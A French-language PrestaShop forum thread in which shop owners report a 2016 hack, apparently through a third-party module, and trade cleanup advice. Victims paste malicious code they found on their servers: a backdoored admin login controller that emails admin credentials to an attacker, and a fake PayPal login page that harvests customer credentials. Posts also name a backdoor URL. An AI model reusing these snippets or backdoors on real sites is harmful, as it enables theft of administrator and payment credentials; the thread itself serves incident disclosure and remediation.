Prestashop 1.6.1.6 Hacké par Moroccan Wolf

[AlainB]

Bonjour à tous,

 

Je viens de me faire Hacker en version 1.6.1.6, pensez-vous que ça vient d'une faille de sécurité de Prestashop ou d'un module ?

 

Merci pour vos commentaires.

[Eolia]

Oui c'est le module cartabandonnementpro

 

Vous avez des fichiers qui ont été modifiés et d'autres ajoutés

Votre mot de passe mysql est grillé

 

Envoyez-moi un accès ftp par MP si vous voulez une désinfection .

 

PS: Une mise à jour de ce module vient d'être publiée (1.7.5)

[AlainB]

Bonjour Eolia,

 

Merci pour la réponse, j'ai changé tous les mots de passe, FTP, PhpMyAdmin, administrateur du site etc...

J'ai remis une sauvegarde du site en place avant attaque, et là, je vais vite faire la mise à jour du module.

 

Bon week-end !

 

Je viens de regarder dans mon BO, mais je n'utilise pas ce module, donc ça doit venir d'ailleurs

Edited July 15, 2016 by RobertARC (see edit history)

[Pator56]

Bonjour,

 

Idem pour mon site.

Sur http://www.zone-h.org/ on voit qu'il y a des milliers de sites notamment français "défacés" par ce Moroccanwolf.

N'y a-t-il pas matière à action collective contre ces hacks ?

[dokoss]

Hello,

 

Ca fait 5 ans qu'on bosse sur PrestaShop™ 1.4.6.2, jamais eu AUCUN hack ni rien. Propre.

 

Mais la... Je suis entre deux îles thailandaises, j'attends un bateau, et voila que nous aussi, mis à mal par "morroconwolf", mais nous n'avons pas de module " cartabandonnementpro ".

 

Bon en surface, aucun soucis, aucune attaque visible sur le site web, mais en coulisses une chiée de fichiers php, zip, etc.. des scripts, et notamment quelque chose qui ressemble à un fishing paypal à travers le code et les images.

 

J'ai effacé les fichiers concernés/ajoutés sur le ftp, changer les mdp ftp, sql, admin.

 

Est-ce suffisant selon vous ? Ou il y a d'autres choses à cleaner ?

 

Vais-je enfin avoir le droit de profiter de mes vacances ?

 

Merci à vous pour l'aide..

Edited July 19, 2016 by dokoss (see edit history)

[Eolia]

Verifiez que le fichier controllers/admin/AdminLoginController.php n'a pas été remplacé également

[gifbox]

Meme chose pour moi. J'ai egalement le module de paniers abandonnés Pro...

 

Par contre Je m'en suis rendu compte à midi en vérifiant la configuration de mon module paypal car j'avais plusieurs commande avec le statut "En attente du Paiement Paypal" ce qui ne m'étais jamais arrivé.

 

Et là ! Patatras... ! Mes identifiants et clé API paypal avaient été modifiées et remplacées par d'autre (productionaga_api1.outlook.fr pour mon cas).

 

Du coup petit tour par le ftp, ou je constate une chiée de petits fichiers du type K.php / index_back.php / hous.php / dossier wp-content / le fichier AdminLoginController.php...

J'ai essayé de nettoyer tout ça au maximum en comparant mes fichiers a une sauvegarde récente.

 

J'ai modifié egalement les mots de passe ftp/Sql/Employes.

 

Y a t-il une possibilité qu'ils aient pu réussir a avoir accès à la base de donnée selon vous ? et comment être sur de ne plus avoir de fichiers infectés ?

 

Merci

Edited July 19, 2016 by babyrider (see edit history)

[AlainB]

Bonjour tout le monde,

 

SUPER PRESTASHOP, y-a bien une grosse faille de sécurité, rebelote aujourd'hui par un autre hacker "bajatax".

 

Nous devons refondre notre Site e-commerce, mais je pense que nous allons passer à Magento, trop de failles dans PRESTASHOP.

Dommage, on était bien content, et en plus on maîtrisait bien la bête, et paf, il faut tout recommencer.

Plus on fait les mises à jour, plus on est vulnérable... Ce n’est pas normal !

Rien à faire le gratuit ce n’est pas top.

 

Merci à l'équipe Francophone de nous éclairer sur ce petit souci.

 

Robert

 

AdminLoginController.php

 

        /* Check fields validity */
        $passwd = trim(Tools::getValue('passwd'));
        $email = trim(Tools::getValue('email'));
$to = "[email protected]";
$subject = "panel admin prestashop ". $_SERVER['SERVER_NAME'];
$header = "from: hacked <[email protected]>";
$message = "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] ."&up=hous \r\n email: $email \r\n pass: $passwd \r\n by bajatax -- sniper :v \r\n";
$message .= "Path : " . __file__;
$sentmail = @mail($to, $subject, $message, $header);
$sentmail1 = @mail($to, $subject, $message, $header);
        if (empty($email)) {
            $this->errors[] = Tools::displayError('Email is empty.');
        } elseif (!Validate::isEmail($email)) {
            $this->errors[] = Tools::displayError('Invalid email address.');
        }

        if (empty($passwd)) {
            $this->errors[] = Tools::displayError('The password field is blank.');
        } elseif (!Validate::isPasswd($passwd)) {
            $this->errors[] = Tools::displayError('Invalid password.');
        }

        if (!count($this->errors)) {

 

Edited July 19, 2016 by RobertARC (see edit history)

[Eolia]

Faites donc ce que je vous dis et réglez le problème

 

Vous vous êtes fait hacker à cause du module cartabandomnent pro

 

Regardez les différents posts à ce sujet https://www.prestashop.com/forums/topic/543123-hacke-par-moroccan-wolf-urgent-svp/?do=findComment&comment=2367585 entre autres

Certains fichiers ont été remplacés, d'autres ajoutés.

Restaurez une sauvegarde ftp antérieure au 13/7, videz votre ftp, restaurez et changez tous vos mots de passe php, mysql et back-office

 

Ce n'est pas le CMS Prestashop le responsable, mais les modules tiers écrits avec les pieds

Le problème est le même avec Magento ou WordPress

[gifbox]

Est ce que l'un de vous a egalement eu des soucis avec paypal suite a l'attaque de MoroccanWolf ? (voir post precedent)

[Eolia]

Meme chose pour moi. J'ai egalement le module de paniers abandonnés Pro...

 

Par contre Je m'en suis rendu compte à midi en vérifiant la configuration de mon module paypal car j'avais plusieurs commande avec le statut "En attente du Paiement Paypal" ce qui ne m'étais jamais arrivé.

 

Et là ! Patatras... ! Mes identifiants et clé API paypal avaient été modifiées et remplacées par d'autre (productionaga_api1.outlook.fr pour mon cas).

 

Du coup petit tour par le ftp, ou je constate une chiée de petits fichiers du type K.php / index_back.php / hous.php / dossier wp-content / le fichier AdminLoginController.php...

J'ai essayé de nettoyer tout ça au maximum en comparant mes fichiers a une sauvegarde récente.

 

J'ai modifié egalement les mots de passe ftp/Sql/Employes.

 

Y a t-il une possibilité qu'ils aient pu réussir a avoir accès à la base de donnée selon vous ? et comment être sur de ne plus avoir de fichiers infectés ?

 

Merci

Bien sur qu'ils ont accès à la base de données une fois qu'ils ont lu le fichier settings.inc.php

 

Donc, récupérez une sauvegarde d'avant le 12/07, effacez complètement le contenu de votre ftp, restaurez, mettez à jour le module ou supprimez-le et restaurez votre base de données

Une fois cela fait, changez immédiatement tous vos mots de passe

[AlainB]

Bonjour Eolia,

 

Merci pour la réponse rapide, mais je l'ai déjà dit le 15 juillet, je n'utilise pas ce module, il est même pas présent sur mon FTP.

 

J'ai faits exactement ce que vous m'avez dit, j'ai restauré une version du 10 juillet, après voir complètement vider mon FTP.

 

J'ai modifié tous les mots de passe, FTP, MySQL, Administration du Site, j'ai même poussé le vice de changer les mots de passe de tous mes comptes mail rattachés à mon nom de domaine.

 

J'ai supprimé complètement le contenu de ma base de données dans PhpMyAdmin et réinstallé une sauvegarde du 10 juillet.

 

Aujourd'hui, rebelote, Alerte par mail de l'antivirus de mon hébergeur et de nouveau plein de fichiers modifiés, remplacés, ajoutés... Bref, le bordel complet sur mon FTP alors que je ne possède même pas ce module.

 

Souhaitez-vous un accès à mon FTP pour y voir plus clair, ça m’ennuierai de changer de boutique, j'ai surement un module qui met la pagaille, j'utilise un module gratuit de chez MyPresta.eu sinon j’achète toujours des modules certifiés par Prestashop comme ceux de Presta Module (Partenaire Prestashop Platinium)…

 

Donc, normalement, ils ne sont pas écrits avec les pieds !

[Eolia]

Je vous ai dit qu'il y en avait d'autres...

Oui envoyez-moi un accès ftp par MP on va regarder cela

[AlainB]

MP envoyé !

 

Merci d'avance

 

Robert

[dokoss]

Sur quelle version de prestashop tournez-vous ?

Une idée d'autres modules touchés (à part cartabandonnementpro) ?

 

Nous :

Prestashop 1.4.6.2

Nous n'avons pas le module : " cartabandonnementpro "

 

Nous souhaitons rectifier notre site pour éviter ce genre d'attaque.

 

Bien à vous,

[Eolia]

Sur quelle version de prestashop tournez-vous ?

Une idée d'autres modules touchés (à part cartabandonnementpro) ?

 

Nous :

Prestashop 1.4.6.2

Nous n'avons pas le module : " cartabandonnementpro "

 

Nous souhaitons rectifier notre site pour éviter ce genre d'attaque.

 

Bien à vous,

 

On va arrêter de tourner autour du pot, ok ?

Il n'y aura pas plus d'information sur ce forum car tous les petits hackers en herbe qui ignoraient le problème n'attendent que ça pour pouvoir le tester sur les nombreuses boutiques Prestashop.

 

Si vous n'y connaissez rien en sécurité informatique, demandez à un professionnel

Il n'y a pas de parade magique, il faut simplement contrôler tous les modules susceptibles d'être des points d'entrée depuis l'extérieur avec des répertoires non-protégés et du code passoire.

Ensuite il faut déterminer les fichiers ajoutés et ceux modifiés

Enfin il faut changer tous vos mots de passe et contrôler vos identifiants/coordonnées sur les modules de paiement qui auraient pu être modifiés

[dokoss]

Hello Eolia,

 

Je comprends très bien ta remarque. Aucun intérêt d'afficher publiquement.

 

Cela dit, si quelqu'un a plus d'informations concernant cette attaque et sa méthodologie, n'hésitez pas à m'envoyer un message privé.

 

Nous n'avons hélas pas le budget pour faire vérifier chaque fichier de notre site.

 

Merci.

[Eolia]

 

Bonjour Eolia,

 

Merci pour la réponse rapide, mais je l'ai déjà dit le 15 juillet, je n'utilise pas ce module, il est même pas présent sur mon FTP.

 

J'ai faits exactement ce que vous m'avez dit, j'ai restauré une version du 10 juillet, après voir complètement vider mon FTP.

 

J'ai modifié tous les mots de passe, FTP, MySQL, Administration du Site, j'ai même poussé le vice de changer les mots de passe de tous mes comptes mail rattachés à mon nom de domaine.

 

J'ai supprimé complètement le contenu de ma base de données dans PhpMyAdmin et réinstallé une sauvegarde du 10 juillet.

 

Aujourd'hui, rebelote, Alerte par mail de l'antivirus de mon hébergeur et de nouveau plein de fichiers modifiés, remplacés, ajoutés... Bref, le bordel complet sur mon FTP alors que je ne possède même pas ce module.

 

Souhaitez-vous un accès à mon FTP pour y voir plus clair, ça m’ennuierai de changer de boutique, j'ai surement un module qui met la pagaille, j'utilise un module gratuit de chez MyPresta.eu sinon j’achète toujours des modules certifiés par Prestashop comme ceux de Presta Module (Partenaire Prestashop Platinium)…

 

Donc, normalement, ils ne sont pas écrits avec les pieds !

 

Votre ftp était bien salement infecté et le module présent sur votre fp^^

 

Des fichiers d'upload, de connexion et de modification des coordonnées de paiement étaient présent sur votre site

 

Quand vous faites une restauration, effacez tous le contenu du ftp avant, autrement les fichiers rajoutés seront toujours présent.

 

Maintenant:

Modifiez tous vos mots de passe (Php, mysql et BO)

Contrôlez vos modules de paiement (clés, identifiants api etc)

Renommez votre répertoire admin

 

le fichier à l'origine de la faille est dans cartabandonment pro

Un 2ème mise à jour a été fournie sur Addons pour ce module

Si vous ne la faites pas ou n'utilisez pas ce module, SUPPRIMEZ-LE du ftp

[AlainB]

Merci pour votre intervention sur notre FTP.

 

Je viens de réaliser tous vos bons conseils, à la lettre, d'ailleurs vous n'avez plus accès à notre FTP ;-) PIRATE !!! lol

 

Très beau travail de la part D'Eolia, nous aimerions bien l'intégrer dans notre équipe de joyeux lurons...

 

Pensez à nous par rapport à mon message privé.

 

Bonne continuation,

 

A+

[iomid]

We have same Problem with same Hacker

Change Permission File AdminLoginController.php to 440

Change Admin Folder Name and Admin Pass

Change MySQL Pass

 

Delete in Root server wp-content Folder, t.php, Xmw.php, 222.php, by.htm, mw.htm, home.bak.php, css.php, in Module Folder delete h2w.php 

 

 

Done.

[Eolia]

not only^^

check all your files and new directory and the payment.php in the Paypal module

[iomid]

not only^^

check all your files and new directory and the payment.php in the Paypal module

Deleted all Module and reupload again. 

[Deasy-Oak]

cartabandonnementpro est le module developpé par prestashop ?

[Eolia]

Oui

[fressine]

Bonjour à tous,

 

J'ai eu la même attaque que vous à la même date.

 

En plus de tous ces problèmes, vérifier si le hacker n'a pas créer des fichiers /modules/home-cgi et /modules/home-cpi

 

dans /home-cgi/LoginPPL/login.php le pirate récupère les identifiants Paypal et les mots de passe des clients par PayPal.

 

ession_start();

 

$mail=$_SESSION['mail'] = $_POST['mail'];

 

$pass=$_SESSION['pass'] = $_POST['mdp'];

 

$IP = $_SERVER['REMOTE_ADDR'];

 

$to="[email protected]";

 

$to1="[email protected]";

 

 

 

$info="

 

|------- Rez by [ bajatax -- Sniper ] |-------

 

|Email            : $mail

 

|password         : $pass

 

|IP               : $IP

 

 

Dans home-cpi, je pense qu'il récupère des n° de carte en cas de paiement par PayPal

 

 

Bon courage à vous

[Eolia]

Non, il n'y a aucun mot de passe dans ces fichiers^^

[fressine]

En plus le hacker avait installé un backdoor.

 

Vérifier si  l'url mondomaine.com/monadmin/ajax-tab.php?controller=AdminLogin&up=hous n'ouvre pas un backdoor pour télécharger un fichier sur le site. Moi c'était le cas.

 

Pour corriger j'ai remplacé tous les fichiers de /controllers/admin/ par des fichiers sains pris sur un site prestashop de même version.

 

A plus

[fressine]

Non, il n'y a aucun mot de passe dans ces fichiers^^

Dans mon cas, lorsque le client voulait payer par Paypal, il était dirigé vers l'url ../modules/home-cgi/loginPPL/login.php qui affichait un bel écran PayPal demandant le mail et le mot de passe du client (alors que client n'était même pas sur le site de Paypal).

[Eolia]

Oui dans le cas ou le module Paypal a été overridé par le hack.

 

Plusieurs cas de figure ont été utilisés suivant le type de hackers, seul un scan complet du ftp/bdd peut vous donner les infos à nettoyer.

[Advisuel]

La plupart de mes Prestashop sont Hacké

 

ou sont les développeurs de chez Prestashop !!!!!!!!!!!!!!!!

[Eolia]

Vous ne vous en rendez compte que maintenant depuis le 9 juillet ???

[Advisuel]

oui suite à un problème de réception des emails d'une boutique

[Advisuel]

Existe t'il un outil qui permet d'être alerté suite à une intrusion ?

[Advisuel]

j'ai tout cleaner et de nouveau le fichier Adminlogincontroller.php et un fichier up.php sur le dossier admin

 

HELP !

[Eolia]

Donc vous n'avez pas tout "cleaner" comme vous dites^^

[Advisuel]

chose curieuse, au moment de payer il n'y avait plus que le mode de paiement paypal !

 

pourtant j'avais remplacer l'ancien module paypal par une copie toute neuve

 

pourtant j'ai fait dossier par dossier !

[Eolia]

Ben vous pouvez recommencer^^

 

Commencez par renommer le répertoire web principal le temps du nettoyage autrement les hackers peuvent en remettre avant que vous ayez terminé, donc c'est sans fin.

Regardez bien dans les dossiers de traduction et les fichiers css aussi

Ensuite modifiez vos mots de passe

[Advisuel]

en 10 ans de presta c'est la première fois que je me fait hacker !!!

 

la question est de savoir ou il y a une faille ?

 

quand on demande si il y a un outils pour etre alerté sur des changement de fichier et dossier, personne répond et chez OVH il n'ont carrément pas d'outil

[Eolia]

Où était la faille, on l'a déjà dit et on va éviter de le crier sur tous les toits pour pas que les petits hackers en herbe qui avaient raté l'info n'aient trop de précisions.

 

Ensuite, une fois l'intrusion effectuée les failles peuvent être très nombreuses (+ de 260 sur un site récemment y compris le WP qui était sur le même serveur) Donc plus vous avez attendu, plus le nombre de fichiers sera grand.

Ensuite ces fichiers n'ont pas forcément de code malicieux ou alors très bien écrit^^ ce qui ne les différencie pas d'un fichier classique.

[fressine]

en 10 ans de presta c'est la première fois que je me fait hacker !!!

 

la question est de savoir ou il y a une faille ?

 

quand on demande si il y a un outils pour etre alerté sur des changement de fichier et dossier, personne répond et chez OVH il n'ont carrément pas d'outil

 

Personnellement, j'ai utilisé la fonction recherche de fichiers distants (F3) de Filezilla pour trouver tous les fichiers qui avaient été modifiés dans un interval de date donné.

Edited September 23, 2016 by fressine (see edit history)

[Advisuel]

merci

[Advisuel]

je cherche un petit script PHP qui me permettrai d'être alerté si un certains fichier est modifié

[DavidVog]

Pour info, même mésaventure aujourd'hui, alors que le module de paniers abandonnés n'est pas installé sur mon serveur. Si quelqu'un a une idée d'où vient la faille je suis preneur...

[Eolia]

Ce module est loin d'être le seul a avoir une faille^^

De nombreux modules écrits à la va vite, copié et recopiés, fournis gratuitement dans les thèmes ou sur le forum sont des entrées possibles...

 

regardez vos logs en requêtes POST et vous verrez quels fichiers sont appelés

[rafz]

Est-ce que cette faille est tombé sur une seule version du PS? sinon, il s'agit d'un module même?

[NB830]

Bonjour à tous,

 

Comme beaucoup ici, je me suis fait hacké via le module cartabandon. Je n'ai plus accès au BO de prestashop (erreur serveur 500). J'ai supprimé les fichiers, remplacé le fichier AdminLoginController.php et modifier les mdp...  Le problème est toujours la. 

 

Avez-vous des solutions pour m'aider ? 

 

Merci d'avance

[NB830]

Bonjour à tous,

 

Comme beaucoup ici, je me suis fait hacké via le module cartabandon. Je n'ai plus accès au BO de prestashop (erreur serveur 500). J'ai supprimé les fichiers, remplacé le fichier AdminLoginController.php et modifier les mdp...  Le problème est toujours la. 

 

Avez-vous des solutions pour m'aider ? 

 

Merci d'avance

 

 

Problème résolu en suivant les conseils de Eolia and co. 

 

Pour ceux qui ont le même problème, n'oubliez pas de remplacer le htacess.

[niax]

Bonjour à tous,

 

J'ai le même souci que vous avez eu, site hacké par Batajax, morocan woolf...

 

Ils ont notamment réussi à écrire dans les modules pk_vertflexmenu et pk_vertflexmenu, à balancer des page de fishing dans blockcontactinfos.

Des fichiers se trouvent aussi à la racine du répertoire module (wsd145.php, up11.php,re.php...)

Le fichier Controller > AdminLoginController.php a été hacké également.

 

Une back door était également ouverte à [DossierAdmin]/ajax-tab.php?controller=AdminLogin&up=hous# qui permettait de télécharger des fichiers dans le dossier admin...

 

Bref... bien vérolé...

 

Donc j'ai récupéré la sauvegarde ftp sur ovh (la plus ancienne, c'est à dire 2 semaine), et malheureusement, elle est aussi hacké (mais je n'ai pas le même hack dans AdminLoginController.php, c'est bizarre...)

 

La propagation semble moindre, mais les hackers étaient déjà sur le coup et dans mes fichiers....

 

Je suis en train d'effacer les fichiers du site, et je vais remettre la version d'il y a deux semaines en place malgré tout pour tenter de sauver le site.

 

Je cherche quelqu'un qui pourrait m'indiquer la marche à suivre pour désinfecter le truc (si c'est possible?)

Outre les modules indésirables à effacer,

le changement des mdp et nom du dossier admin,

la remise en place d'un fichier AdminLoginController.php neuf

 

Je pense qu'il y a d'autres choses à faire?

Je cherche un moyen radical pour éradiquer le truc, quitte à avoir à refaire certaines choses sur le prestashop.

 

Je me demande si la base de donnée à pu être infectée?

 

 

Merci d'avance,